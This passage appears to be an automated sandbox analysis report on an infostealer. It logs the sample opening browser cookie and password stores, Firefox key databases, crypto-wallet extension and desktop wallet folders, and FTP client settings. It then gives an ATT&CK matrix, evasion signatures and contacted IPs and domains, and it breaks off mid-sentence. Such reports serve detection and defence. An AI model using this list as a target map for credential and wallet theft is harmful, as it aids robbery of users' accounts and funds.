                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
                        Source: Yara matchFile source: Process Memory Space: 0tClIDb.exe PID: 7872, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: Process Memory Space: 0tClIDb.exe PID: 7872, type: MEMORYSTR
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00AEEC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,6_2_00AEEC48
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00AEDF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,6_2_00AEDF51
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                        Windows Management Instrumentation
                        1
                        DLL Side-Loading
                        1
                        DLL Side-Loading
                        1
                        Disable or Modify Tools
                        2
                        OS Credential Dumping
                        1
                        System Time Discovery
                        Remote Services1
                        Archive Collected Data
                        12
                        Ingress Tool Transfer
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Native API
                        1
                        Scheduled Task/Job
                        12
                        Process Injection
                        1
                        Deobfuscate/Decode Files or Information
                        LSASS Memory1
                        Account Discovery
                        Remote Desktop Protocol41
                        Data from Local System
                        11
                        Encrypted Channel
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts2
                        Command and Scripting Interpreter
                        121
                        Registry Run Keys / Startup Folder
                        1
                        Scheduled Task/Job
                        3
                        Obfuscated Files or Information
                        Security Account Manager12
                        File and Directory Discovery
                        SMB/Windows Admin SharesData from Network Shared Drive3
                        Non-Application Layer Protocol
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts1
                        Scheduled Task/Job
                        Login Hook121
                        Registry Run Keys / Startup Folder
                        12
                        Software Packing
                        NTDS235
                        System Information Discovery
                        Distributed Component Object ModelInput Capture124
                        Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        Timestomp
                        LSA Secrets861
                        Security Software Discovery
                        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        DLL Side-Loading
                        Cached Domain Credentials2
                        Process Discovery
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                        Masquerading
                        DCSync361
                        Virtualization/Sandbox Evasion
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job361
                        Virtualization/Sandbox Evasion
                        Proc Filesystem1
                        Application Window Discovery
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                        Process Injection
                        /etc/passwd and /etc/shadow1
                        System Owner/User Discovery
                        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1571005 Sample: file.exe Startdate: 08/12/2024 Architecture: WINDOWS Score: 100 61 impend-differ.biz 2->61 63 se-blurry.biz 2->63 65 2 other IPs or domains 2->65 81 Suricata IDS alerts for network traffic 2->81 83 Found malware configuration 2->83 85 Antivirus detection for URL or domain 2->85 87 12 other signatures 2->87 11 skotes.exe 16 2->11         started        16 file.exe 5 2->16         started        18 skotes.exe 2->18         started        20 2 other processes 2->20 signatures3 process4 dnsIp5 73 185.215.113.43, 49753, 49759, 49781 WHOLESALECONNECTIONSNL Portugal 11->73 75 31.41.244.11, 49765, 80 AEROEXPRESS-ASRU Russian Federation 11->75 51 C:\Users\user\AppData\Local\...\0tClIDb.exe, PE32 11->51 dropped 53 C:\Users\user\AppData\...\0tClIDb[1].exe, PE32 11->53 dropped 109 Hides threads from debuggers 11->109 111 Tries to detect sandboxes / dynamic malware analysis system (registry check) 11->111 113 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 11->113 22 0tClIDb.exe 1 11->22         started        55 C:\Users\user\AppData\Local\...\skotes.exe, PE32 16->55 dropped 57 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 16->57 dropped 115 Detected unpacking (changes PE section rights) 16->115 117 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 16->117 119 Tries to evade debugger and 